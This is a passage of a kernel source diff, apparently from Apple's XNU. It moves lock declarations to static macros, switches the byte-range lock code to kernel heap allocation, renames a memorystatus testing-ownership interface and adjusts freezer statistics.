@@ -1642,7 +1636,6 @@ SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = {
        .mpo_vnode_check_open = vng_vnode_check_open,
 
        .mpo_policy_syscall = vng_policy_syscall,
-       .mpo_policy_init = vng_init,
 };
 
 static const char *vng_labelnames[] = {
index e60018e65ba849f1109c799e1429286e92cbae14..55dc92a99f896003ff304ece29bd0754e5c32c07 100644 (file)
@@ -62,9 +62,8 @@ typedef int (*setint_t)(int);
 
 static int kpc_initted = 0;
 
-static lck_grp_attr_t *sysctl_lckgrp_attr = NULL;
-static lck_grp_t *sysctl_lckgrp = NULL;
-static lck_mtx_t sysctl_lock;
+static LCK_GRP_DECLARE(sysctl_lckgrp, "kpc");
+static LCK_MTX_DECLARE(sysctl_lock, &sysctl_lckgrp);
 
 /*
  * Another element is needed to hold the CPU number when getting counter values.
@@ -76,10 +75,6 @@ typedef int (*setget_func_t)(int);
 void
 kpc_init(void)
 {
-       sysctl_lckgrp_attr = lck_grp_attr_alloc_init();
-       sysctl_lckgrp = lck_grp_alloc_init("kpc", sysctl_lckgrp_attr);
-       lck_mtx_init(&sysctl_lock, sysctl_lckgrp, LCK_ATTR_NULL);
-
        kpc_arch_init();
 
        kpc_initted = 1;
index c36219ae7aed3098cb1f9a81507c5894bddd6a9a..3f2a7ef0f9b28f940ba85ed97de02f3dac91f686 100644 (file)
@@ -70,7 +70,8 @@ char *proc_name_address(void *p);
 
 kern_return_t ktrace_background_available_notify_user(void);
 
-static lck_mtx_t *ktrace_mtx;
+static LCK_GRP_DECLARE(ktrace_grp, "ktrace");
+static LCK_MTX_DECLARE(ktrace_mtx, &ktrace_grp);
 
 /*
  * The overall state of ktrace, whether it is unconfigured, in foreground mode,
@@ -148,7 +149,7 @@ void
 ktrace_lock(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_lock(ktrace_mtx);
+               lck_mtx_lock(&ktrace_mtx);
        }
 }
 
@@ -156,7 +157,7 @@ void
 ktrace_unlock(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_unlock(ktrace_mtx);
+               lck_mtx_unlock(&ktrace_mtx);
        }
 }
 
@@ -164,7 +165,7 @@ void
 ktrace_assert_lock_held(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_assert(ktrace_mtx, LCK_MTX_ASSERT_OWNED);
+               lck_mtx_assert(&ktrace_mtx, LCK_MTX_ASSERT_OWNED);
        }
 }
 
@@ -548,24 +549,3 @@ out:
        ktrace_unlock();
        return ret;
 }
-
-/* This should only be called from the bootstrap thread. */
-void
-ktrace_init(void)
-{
-       static lck_grp_attr_t *lock_grp_attr = NULL;
-       static lck_grp_t *lock_grp = NULL;
-       static bool initialized = false;
-
-       if (initialized) {
-               return;
-       }
-
-       lock_grp_attr = lck_grp_attr_alloc_init();
-       lock_grp = lck_grp_alloc_init("ktrace", lock_grp_attr);
-       lck_grp_attr_free(lock_grp_attr);
-
-       ktrace_mtx = lck_mtx_alloc_init(lock_grp, LCK_ATTR_NULL);
-       assert(ktrace_mtx != NULL);;
-       initialized = true;
-}
index 03f86bef2ab9b6e6bfec2f5ccedca0832fa46af6..18e372d11c689ebc67546846b61954fecf5ffbce 100644 (file)
@@ -117,7 +117,11 @@ SYSCTL_INT(_debug, OID_AUTO, lockf_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &lockf_de
 #define LOCKF_DEBUG(mask, ...)          /* mask */
 #endif  /* !LOCKF_DEBUGGING */
 
-MALLOC_DEFINE(M_LOCKF, "lockf", "Byte-range locking structures");
+/*
+ * If you need accounting for KM_LOCKF consider using
+ * ZONE_VIEW_DEFINE to define a view.
+ */
+#define KM_LOCKF       KHEAP_DEFAULT
 
 #define NOLOCKF (struct lockf *)0
 #define SELF    0x1
@@ -152,15 +156,8 @@ static void      lf_boost_blocking_proc(struct lockf *, struct lockf *);
 static void      lf_adjust_assertion(struct lockf *block);
 #endif /* IMPORTANCE_INHERITANCE */
 
-static lck_mtx_t lf_dead_lock;
-static lck_grp_t *lf_dead_lock_grp;
-
-void
-lf_init(void)
-{
-       lf_dead_lock_grp = lck_grp_alloc_init("lf_dead_lock", LCK_GRP_ATTR_NULL);
-       lck_mtx_init(&lf_dead_lock, lf_dead_lock_grp, LCK_ATTR_NULL);
-}
+static LCK_GRP_DECLARE(lf_dead_lock_grp, "lf_dead_lock");
+static LCK_MTX_DECLARE(lf_dead_lock, &lf_dead_lock_grp);
 
 /*
  * lf_advlock
@@ -285,7 +282,7 @@ lf_advlock(struct vnop_advlock_args *ap)
        /*
         * Create the lockf structure
         */
-       MALLOC(lock, struct lockf *, sizeof *lock, M_LOCKF, M_WAITOK);
+       lock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK);
        if (lock == NULL) {
                return ENOLCK;
        }
@@ -336,21 +333,21 @@ lf_advlock(struct vnop_advlock_args *ap)
 
        case F_UNLCK:
                error = lf_clearlock(lock);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        case F_GETLK:
                error = lf_getlock(lock, fl, -1);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        case F_GETLKPID:
                error = lf_getlock(lock, fl, fl->l_pid);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        default:
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                error = EINVAL;
                break;
        }
@@ -451,7 +448,7 @@ lf_coalesce_adjacent(struct lockf *lock)
 
                        lf_move_blocked(lock, adjacent);
 
-                       FREE(adjacent, M_LOCKF);
+                       kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf));
                        continue;
                }
                /* If the lock starts adjacent to us, we can coalesce it */
@@ -466,7 +463,7 @@ lf_coalesce_adjacent(struct lockf *lock)
 
                        lf_move_blocked(lock, adjacent);
 
-                       FREE(adjacent, M_LOCKF);
+                       kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf));
                        continue;
                }
 
@@ -538,7 +535,7 @@ scan:
                 */
                if ((lock->lf_flags & F_WAIT) == 0) {
                        DTRACE_FSINFO(advlock__nowait, vnode_t, vp);
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        return EAGAIN;
                }
 
@@ -676,7 +673,7 @@ scan:
                                                LOCKF_DEBUG(LF_DBG_DEADLOCK, "lock %p which is me, so EDEADLK\n", lock);
                                                proc_unlock(wproc);
                                                lck_mtx_unlock(&lf_dead_lock);
-                                               FREE(lock, M_LOCKF);
+                                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                                return EDEADLK;
                                        }
                                }
@@ -695,7 +692,7 @@ scan:
                    lock->lf_type == F_WRLCK) {
                        lock->lf_type = F_UNLCK;
                        if ((error = lf_clearlock(lock)) != 0) {
-                               FREE(lock, M_LOCKF);
+                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                return error;
                        }
                        lock->lf_type = F_WRLCK;
@@ -799,7 +796,7 @@ scan:
                        if (!TAILQ_EMPTY(&lock->lf_blkhd)) {
                                lf_wakelock(lock, TRUE);
                        }
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        /* Return ETIMEDOUT if timeout occoured. */
                        if (error == EWOULDBLOCK) {
                                error = ETIMEDOUT;
@@ -852,7 +849,7 @@ scan:
                        }
                        overlap->lf_type = lock->lf_type;
                        lf_move_blocked(overlap, lock);
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        lock = overlap; /* for lf_coalesce_adjacent() */
                        break;
 
@@ -862,7 +859,7 @@ scan:
                         */
                        if (overlap->lf_type == lock->lf_type) {
                                lf_move_blocked(overlap, lock);
-                               FREE(lock, M_LOCKF);
+                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                lock = overlap; /* for lf_coalesce_adjacent() */
                                break;
                        }
@@ -877,7 +874,7 @@ scan:
                                 * resource shortage.
                                 */
                                if (lf_split(overlap, lock)) {
-                                       FREE(lock, M_LOCKF);
+                                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                        return ENOLCK;
                                }
                        }
@@ -906,7 +903,7 @@ scan:
                        } else {
                                *prev = overlap->lf_next;
                        }
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        continue;
 
                case OVERLAP_STARTS_BEFORE_LOCK:
@@ -1000,7 +997,7 @@ lf_clearlock(struct lockf *unlock)
 
                case OVERLAP_EQUALS_LOCK:
                        *prev = overlap->lf_next;
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        break;
 
                case OVERLAP_CONTAINS_LOCK: /* split it */
@@ -1021,7 +1018,7 @@ lf_clearlock(struct lockf *unlock)
                case OVERLAP_CONTAINED_BY_LOCK:
                        *prev = overlap->lf_next;
                        lf = overlap->lf_next;
-                       FREE(overlap, M_LOCKF);
+                       kheap_free(KM_LOCKF, overlap, sizeof(struct lockf));
                        continue;
 
                case OVERLAP_STARTS_BEFORE_LOCK:
@@ -1346,7 +1343,7 @@ lf_split(struct lockf *lock1, struct lockf *lock2)
         * Make a new lock consisting of the last part of
         * the encompassing lock
         */
-       MALLOC(splitlock, struct lockf *, sizeof *splitlock, M_LOCKF, M_WAITOK);
+       splitlock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK);
        if (splitlock == NULL) {
                return ENOLCK;
        }
@@ -1465,13 +1462,13 @@ lf_print(const char *tag, struct lockf *lock)
                    lock->lf_type == F_RDLCK ? "shared" :
                    lock->lf_type == F_WRLCK ? "exclusive" :
                    lock->lf_type == F_UNLCK ? "unlock" : "unknown",
-                   (intmax_t)lock->lf_start, (intmax_t)lock->lf_end);
+                   (uint64_t)lock->lf_start, (uint64_t)lock->lf_end);
        } else {
                printf(" %s, start 0x%016llx, end 0x%016llx",
                    lock->lf_type == F_RDLCK ? "shared" :
                    lock->lf_type == F_WRLCK ? "exclusive" :
                    lock->lf_type == F_UNLCK ? "unlock" : "unknown",
-                   (intmax_t)lock->lf_start, (intmax_t)lock->lf_end);
+                   (uint64_t)lock->lf_start, (uint64_t)lock->lf_end);
        }
        if (!TAILQ_EMPTY(&lock->lf_blkhd)) {
                printf(" block %p\n", (void *)TAILQ_FIRST(&lock->lf_blkhd));
@@ -1519,7 +1516,7 @@ lf_printlist(const char *tag, struct lockf *lock)
                    lf->lf_type == F_RDLCK ? "shared" :
                    lf->lf_type == F_WRLCK ? "exclusive" :
                    lf->lf_type == F_UNLCK ? "unlock" :
-                   "unknown", (intmax_t)lf->lf_start, (intmax_t)lf->lf_end);
+                   "unknown", (uint64_t)lf->lf_start, (uint64_t)lf->lf_end);
                TAILQ_FOREACH(blk, &lf->lf_blkhd, lf_block) {
                        printf("\n\t\tlock request %p for ", (void *)blk);
                        if (blk->lf_flags & F_POSIX) {
@@ -1535,8 +1532,8 @@ lf_printlist(const char *tag, struct lockf *lock)
                            blk->lf_type == F_RDLCK ? "shared" :
                            blk->lf_type == F_WRLCK ? "exclusive" :
                            blk->lf_type == F_UNLCK ? "unlock" :
-                           "unknown", (intmax_t)blk->lf_start,
-                           (intmax_t)blk->lf_end);
+                           "unknown", (uint64_t)blk->lf_start,
+                           (uint64_t)blk->lf_end);
                        if (!TAILQ_EMPTY(&blk->lf_blkhd)) {
                                panic("lf_printlist: bad list");
                        }
index 69e5f6d69ab161b390aeb7818cfaf18a3059db75..677c73b03ddfb113b9a66b62974f586826b9baed 100644 (file)
@@ -253,13 +253,13 @@ uint64_t memorystatus_jetsam_snapshot_timeout = 0;
 #if DEVELOPMENT || DEBUG
 /*
  * On development and debug kernels, we allow one pid to take ownership
- * of the memorystatus snapshot (via memorystatus_control).
- * If there's an owner, then only they may consume the snapshot.
- * This is used when testing the snapshot interface to avoid racing with other
- * processes on the system that consume snapshots.
+ * of some memorystatus data structures for testing purposes (via memorystatus_control).
+ * If there's an owner, then only they may consume the jetsam snapshot & set freezer probabilities.
+ * This is used when testing these interface to avoid racing with other
+ * processes on the system that typically use them (namely OSAnalytics & dasd).
  */
-static pid_t memorystatus_snapshot_owner = 0;
-SYSCTL_INT(_kern, OID_AUTO, memorystatus_snapshot_owner, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_snapshot_owner, 0, "");
+static pid_t memorystatus_testing_pid = 0;
+SYSCTL_INT(_kern, OID_AUTO, memorystatus_testing_pid, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_testing_pid, 0, "");
 #endif /* DEVELOPMENT || DEBUG */
 static void memorystatus_init_jetsam_snapshot_header(memorystatus_jetsam_snapshot_t *snapshot);
 
@@ -276,9 +276,10 @@ SYSCTL_INT(_kern, OID_AUTO, entitled_max_task_pmem, CTLTYPE_INT | CTLFLAG_RW | C
 #endif /* DEVELOPMENT || DEBUG */
 #endif /* __arm64__ */
 
-static lck_grp_attr_t *memorystatus_jetsam_fg_band_lock_grp_attr;
-static lck_grp_t *memorystatus_jetsam_fg_band_lock_grp;
-lck_mtx_t memorystatus_jetsam_fg_band_lock;
+static LCK_GRP_DECLARE(memorystatus_jetsam_fg_band_lock_grp,
+    "memorystatus_jetsam_fg_band");
+LCK_MTX_DECLARE(memorystatus_jetsam_fg_band_lock,
+    &memorystatus_jetsam_fg_band_lock_grp);
 
 /* Idle guard handling */
 
@@ -598,7 +599,7 @@ memorystatus_raise_memlimit(proc_t p, int new_memlimit_active, int new_memlimit_
        int memlimit_mb_active = 0, memlimit_mb_inactive = 0;
        boolean_t memlimit_active_is_fatal = FALSE, memlimit_inactive_is_fatal = FALSE, use_active_limit = FALSE;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (p->p_memstat_memlimit_active > 0) {
                memlimit_mb_active = p->p_memstat_memlimit_active;
@@ -918,9 +919,8 @@ int32_t max_kill_priority = JETSAM_PRIORITY_IDLE;
 
 #if DEVELOPMENT || DEBUG
 
-lck_grp_attr_t *disconnect_page_mappings_lck_grp_attr;
-lck_grp_t *disconnect_page_mappings_lck_grp;
-static lck_mtx_t disconnect_page_mappings_mutex;
+static LCK_GRP_DECLARE(disconnect_page_mappings_lck_grp, "disconnect_page_mappings");
+static LCK_MTX_DECLARE(disconnect_page_mappings_mutex, &disconnect_page_mappings_lck_grp);
 
 extern bool kill_on_no_paging_space;
 #endif /* DEVELOPMENT || DEBUG */
@@ -1174,7 +1174,7 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_disconnect_page_mappings, CTLTYPE_INT
 static void
 memorystatus_sort_bucket_locked(unsigned int bucket_index, int sort_order)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        if (memstat_bucket[bucket_index].count == 0) {
                return;
        }
@@ -1406,21 +1406,11 @@ memorystatus_init(void)
 #endif
 
 #if DEVELOPMENT || DEBUG
-       disconnect_page_mappings_lck_grp_attr = lck_grp_attr_alloc_init();
-       disconnect_page_mappings_lck_grp = lck_grp_alloc_init("disconnect_page_mappings", disconnect_page_mappings_lck_grp_attr);
-
-       lck_mtx_init(&disconnect_page_mappings_mutex, disconnect_page_mappings_lck_grp, NULL);
-
        if (kill_on_no_paging_space) {
                max_kill_priority = JETSAM_PRIORITY_MAX;
        }
 #endif
 
-       memorystatus_jetsam_fg_band_lock_grp_attr = lck_grp_attr_alloc_init();
-       memorystatus_jetsam_fg_band_lock_grp =
-           lck_grp_alloc_init("memorystatus_jetsam_fg_band", memorystatus_jetsam_fg_band_lock_grp_attr);
-       lck_mtx_init(&memorystatus_jetsam_fg_band_lock, memorystatus_jetsam_fg_band_lock_grp, NULL);
-
        /* Init buckets */
        for (i = 0; i < MEMSTAT_BUCKET_COUNT; i++) {
                TAILQ_INIT(&memstat_bucket[i].list);
@@ -1625,6 +1615,8 @@ memorystatus_init(void)
 /* Centralised for the purposes of allowing panic-on-jetsam */
 extern void
 vm_run_compactor(void);
+extern void
+vm_wake_compactor_swapper(void);
 
 /*
  * The jetsam no frills kill call
@@ -1694,7 +1686,17 @@ memorystatus_do_kill(proc_t p, uint32_t cause, os_reason_t jetsam_reason, uint64
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_START,
            victim_pid, cause, vm_page_free_count, *footprint_of_killed_proc, 0);
 
-       vm_run_compactor();
+       if (jetsam_reason->osr_code == JETSAM_REASON_VNODE) {
+               /*
+                * vnode jetsams are syncronous and not caused by memory pressure.
+                * Running the compactor on this thread adds significant latency to the filesystem operation
+                * that triggered this jetsam.
+                * Kick of compactor thread asyncronously instead.
+                */
+               vm_wake_compactor_swapper();
+       } else {
+               vm_run_compactor();
+       }
 
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_END,
            victim_pid, cause, vm_page_free_count, 0, 0);
@@ -2713,8 +2715,8 @@ memorystatus_remove(proc_t p)
 #endif
 
 #if DEVELOPMENT || DEBUG
-       if (p->p_pid == memorystatus_snapshot_owner) {
-               memorystatus_snapshot_owner = 0;
+       if (p->p_pid == memorystatus_testing_pid) {
+               memorystatus_testing_pid = 0;
        }
 #endif /* DEVELOPMENT || DEBUG */
 
@@ -3434,6 +3436,10 @@ memorystatus_on_resume(proc_t p)
                        p->p_memstat_state |= P_MEMSTAT_REFREEZE_ELIGIBLE;
                        memorystatus_refreeze_eligible_count++;
                }
+               if (p->p_memstat_thaw_count == 0 || p->p_memstat_last_thaw_interval < memorystatus_freeze_current_interval) {
+                       os_atomic_inc(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed);
+               }
+               p->p_memstat_last_thaw_interval = memorystatus_freeze_current_interval;
                p->p_memstat_thaw_count++;
 
                memorystatus_thaw_count++;
@@ -4812,7 +4818,7 @@ memorystatus_get_task_phys_footprint_page_counts(task_t task,
 static bool
 memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *dst_snapshot, unsigned int dst_snapshot_size, const memorystatus_jetsam_snapshot_entry_t *src_entry)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        assert(dst_snapshot);
 
        if (dst_snapshot->entry_count == dst_snapshot_size) {
@@ -4831,7 +4837,7 @@ memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *d
 static bool
 memorystatus_init_jetsam_snapshot_entry_with_kill_locked(memorystatus_jetsam_snapshot_t *snapshot, proc_t p, uint32_t kill_cause, uint64_t killtime, memorystatus_jetsam_snapshot_entry_t **entry)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        memorystatus_jetsam_snapshot_entry_t *snapshot_list = snapshot->entries;
        size_t i = snapshot->entry_count;
 
@@ -4863,7 +4869,7 @@ memorystatus_update_jetsam_snapshot_entry_locked(proc_t p, uint32_t kill_cause,
        bool copied_to_freezer_snapshot = false;
 #endif /* CONFIG_FREEZE */
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (memorystatus_jetsam_snapshot_count == 0) {
                /*
@@ -5264,7 +5270,7 @@ memorystatus_init_jetsam_snapshot_locked(memorystatus_jetsam_snapshot_t *od_snap
        memorystatus_jetsam_snapshot_entry_t *snapshot_list = NULL;
        unsigned int snapshot_max = 0;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        if (od_snapshot) {
                /*
@@ -5352,7 +5358,7 @@ memorystatus_cmd_set_panic_bits(user_addr_t buffer, size_t buffer_size)
 static int
 memorystatus_verify_sort_order(unsigned int bucket_index, pid_t *expected_order, size_t num_pids)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        int error = 0;
        proc_t p = NULL;
@@ -6995,7 +7001,7 @@ memorystatus_cmd_get_jetsam_snapshot(int32_t flags, user_addr_t buffer, size_t b
                                 */
                                proc_list_lock();
 #if DEVELOPMENT || DEBUG
-                               if (memorystatus_snapshot_owner != 0 && memorystatus_snapshot_owner != current_proc()->p_pid) {
+                               if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) {
                                        /* Snapshot is currently owned by someone else. Don't consume it. */
                                        proc_list_unlock();
                                        goto out;
@@ -7037,27 +7043,27 @@ out:
 
 #if DEVELOPMENT || DEBUG
 static int
-memorystatus_cmd_set_jetsam_snapshot_ownership(int32_t flags)
+memorystatus_cmd_set_testing_pid(int32_t flags)
 {
        int error = EINVAL;
        proc_t caller = current_proc();
        assert(caller != kernproc);
        proc_list_lock();
-       if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP) {
-               if (memorystatus_snapshot_owner == 0) {
-                       memorystatus_snapshot_owner = caller->p_pid;
+       if (flags & MEMORYSTATUS_FLAGS_SET_TESTING_PID) {
+               if (memorystatus_testing_pid == 0) {
+                       memorystatus_testing_pid = caller->p_pid;
                        error = 0;
-               } else if (memorystatus_snapshot_owner == caller->p_pid) {
+               } else if (memorystatus_testing_pid == caller->p_pid) {
                        error = 0;
                } else {
                        /* We don't allow ownership to be taken from another proc. */
                        error = EBUSY;
                }
-       } else if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP) {
-               if (memorystatus_snapshot_owner == caller->p_pid) {
-                       memorystatus_snapshot_owner = 0;
+       } else if (flags & MEMORYSTATUS_FLAGS_UNSET_TESTING_PID) {
+               if (memorystatus_testing_pid == caller->p_pid) {
+                       memorystatus_testing_pid = 0;
                        error = 0;
-               } else if (memorystatus_snapshot_owner != 0) {
+               } else if (memorystatus_testing_pid != 0) {
                        /* We don't allow ownership to be taken from another proc. */
                        error = EPERM;
                }
@@ -7281,6 +7287,13 @@ memorystatus_cmd_grp_set_probabilities(user_addr_t buffer, size_t buffer_size)
        size_t entry_count = 0, i = 0;
        memorystatus_internal_probabilities_t *tmp_table_new = NULL, *tmp_table_old = NULL;
        size_t tmp_table_new_size = 0, tmp_table_old_size = 0;
+#if DEVELOPMENT || DEBUG
+       if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) {
+               /* probabilites are currently owned by someone else. Don't change them. */
+               error = EPERM;
+               goto out;
+       }
+#endif /* (DEVELOPMENT || DEBUG)*/
 
        /* Verify inputs */
        if ((buffer == USER_ADDR_NULL) || (buffer_size == 0)) {
@@ -7679,7 +7692,7 @@ memorystatus_set_memlimit_properties_internal(proc_t p, memorystatus_memlimit_pr
 {
        int error = 0;
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        /*
         * Store the active limit variants in the proc.
@@ -7938,8 +7951,8 @@ memorystatus_control(struct proc *p __unused, struct memorystatus_control_args *
                error = memorystatus_cmd_get_jetsam_snapshot((int32_t)args->flags, args->buffer, args->buffersize, ret);
                break;
 #if DEVELOPMENT || DEBUG
-       case MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP:
-               error = memorystatus_cmd_set_jetsam_snapshot_ownership((int32_t) args->flags);
+       case MEMORYSTATUS_CMD_SET_TESTING_PID:
+               error = memorystatus_cmd_set_testing_pid((int32_t) args->flags);
                break;
 #endif
        case MEMORYSTATUS_CMD_GET_PRESSURE_STATUS:
index 1dfa926e9a02ce3a42cb5dff12e46af38639ad8f..930b2c3c1eb512611ed5ebd6a7078401f8d232e6 100644 (file)
@@ -96,9 +96,8 @@ unsigned long freeze_threshold_percentage = 50;
 
 #if CONFIG_FREEZE
 
-lck_grp_attr_t *freezer_lck_grp_attr;
-lck_grp_t *freezer_lck_grp;
-static lck_mtx_t freezer_mutex;
+static LCK_GRP_DECLARE(freezer_lck_grp, "freezer");
+static LCK_MTX_DECLARE(freezer_mutex, &freezer_lck_grp);
 
 /* Thresholds */
 unsigned int memorystatus_freeze_threshold = 0;
@@ -129,60 +128,7 @@ unsigned int memorystatus_thaw_count = 0; /* # of thaws in the current freezer i
 uint64_t memorystatus_thaw_count_since_boot = 0; /* The number of thaws since boot */
 unsigned int memorystatus_refreeze_eligible_count = 0; /* # of processes currently thawed i.e. have state on disk & in-memory */
 
-/* Freezer counters collected for telemtry */
-static struct memorystatus_freezer_stats_t {
-       /*
-        * # of processes that we've considered freezing.
-        * Used to normalize the error reasons below.
-        */
-       uint64_t mfs_process_considered_count;
-
-       /*
-        * The following counters track how many times we've failed to freeze
-        * a process because of a specific FREEZER_ERROR.
-        */
-       /* EXCESS_SHARED_MEMORY */
-       uint64_t mfs_error_excess_shared_memory_count;
-       /* LOW_PRIVATE_SHARED_RATIO */
-       uint64_t mfs_error_low_private_shared_ratio_count;
-       /* NO_COMPRESSOR_SPACE */
-       uint64_t mfs_error_no_compressor_space_count;
-       /* NO_SWAP_SPACE */
-       uint64_t mfs_error_no_swap_space_count;
-       /* pages < memorystatus_freeze_pages_min */
-       uint64_t mfs_error_below_min_pages_count;
-       /* dasd determined it was unlikely to be relaunched. */
-       uint64_t mfs_error_low_probability_of_use_count;
-       /* transient reasons (like inability to acquire a lock). */
-       uint64_t mfs_error_other_count;
-
-       /*
-        * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold.
-        * Used to normalize skipped_full_count and shared_mb_high_count.
-        */
-       uint64_t mfs_below_threshold_count;
-
-       /* Skipped running the freezer because we were out of slots */
-       uint64_t mfs_skipped_full_count;
-
-       /* Skipped running the freezer because we were over the shared mb limit*/
-       uint64_t mfs_skipped_shared_mb_high_count;
-
-       /*
-        * How many pages have not been sent to swap because they were in a shared object?
-        * This is being used to gather telemtry so we can understand the impact we'd have
-        * on our NAND budget if we did swap out these pages.
-        */
-       uint64_t mfs_shared_pages_skipped;
-
-       /*
-        * A running sum of the total number of bytes sent to NAND during
-        * refreeze operations since boot.
-        */
-       uint64_t mfs_bytes_refrozen;
-       /* The number of refreeze operations since boot */
-       uint64_t mfs_refreeze_count;
-} memorystatus_freezer_stats = {0};
+struct memorystatus_freezer_stats_t memorystatus_freezer_stats = {0};
 
 #endif /* XNU_KERNEL_PRIVATE */
 
@@ -208,6 +154,7 @@ static throttle_interval_t throttle_intervals[] = {
 };
 throttle_interval_t *degraded_throttle_window = &throttle_intervals[0];
 throttle_interval_t *normal_throttle_window = &throttle_intervals[1];
+uint32_t memorystatus_freeze_current_interval = 0;
 
 extern uint64_t vm_swap_get_free_space(void);
 extern boolean_t vm_swap_max_budget(uint64_t *);
@@ -226,6 +173,7 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_count, CTLFLAG_RD | CTLFLAG_LOC
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count, 0, "");
 SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_thaw_count_since_boot, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count_since_boot, "");
 SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_freeze_pageouts, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_pageouts, "");
+SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_interval, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_current_interval, 0, "");
 #if DEVELOPMENT || DEBUG
 static int sysctl_memorystatus_freeze_budget_pages_remaining SYSCTL_HANDLER_ARGS
 {
@@ -285,27 +233,21 @@ static_assert(_kMemorystatusFreezeSkipReasonMax <= UINT8_MAX);
 static int sysctl_memorystatus_freezer_thaw_percentage SYSCTL_HANDLER_ARGS
 {
 #pragma unused(arg1, arg2)
-       size_t thaw_count = 0, frozen_count = 0;
+       uint64_t thaw_count = 0, frozen_count = 0;
        int thaw_percentage = 100;
-       unsigned int band = (unsigned int) memorystatus_freeze_jetsam_band;
-       proc_t p = PROC_NULL;
-       proc_list_lock();
-
-       p = memorystatus_get_first_proc_locked(&band, FALSE);
+       frozen_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_frozen), relaxed);
+       thaw_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed);
 
-       while (p) {
-               if (p->p_memstat_state & P_MEMSTAT_FROZEN) {
-                       if (p->p_memstat_thaw_count > 0) {
-                               thaw_count++;
-                       }
-                       frozen_count++;
-               }
-               p = memorystatus_get_next_proc_locked(&band, p, FALSE);
-       }
-       proc_list_unlock();
        if (frozen_count > 0) {
-               assert(thaw_count <= frozen_count);
-               thaw_percentage = (int)(100 * thaw_count / frozen_count);
+               if (thaw_count > frozen_count) {
+                       /*
